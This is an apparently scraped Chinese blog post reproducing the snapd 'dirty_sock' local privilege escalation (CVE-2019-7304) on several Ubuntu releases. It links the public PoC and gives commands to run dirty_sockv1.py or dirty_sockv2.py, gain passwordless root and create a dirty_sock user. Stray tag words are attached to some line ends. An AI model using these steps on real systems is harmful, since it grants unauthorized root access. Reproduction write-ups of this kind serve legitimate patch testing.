Ubuntu 提權漏洞(CVE-2019-7304)復現

漏洞描述:

Ubuntu 版本:python

Ubuntu 18.10git

Ubuntu 18.04 LTSgithub

Ubuntu 16.04 LTSubuntu

Ubuntu 14.04 LTSbash

2.28 < snapd < 2.37 會存在該漏洞ssh

Poc Github:https://github.com/initstring/dirty_sock網站

 

#1

註冊並登錄, https://login.ubuntu.com/
在 Ubuntu 上,生成密鑰
ssh-keygen -t rsa -C "your_email@example.com"

查看公鑰spa

將公鑰複製到網站上3d

接下來執行 pocblog

python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"

執行完以後 sch01ar 被修改成 Ubuntu 上的用戶名

接着切換爲 root 用戶

sudo -i

 

切換成 root 用戶時不須要輸入密碼

 

#2

直接運行腳本

python3 dirty_sockv2.py

執行完會生成一個 dirty_sock 的用戶,密碼也是這個

相關文章
相關標籤/搜索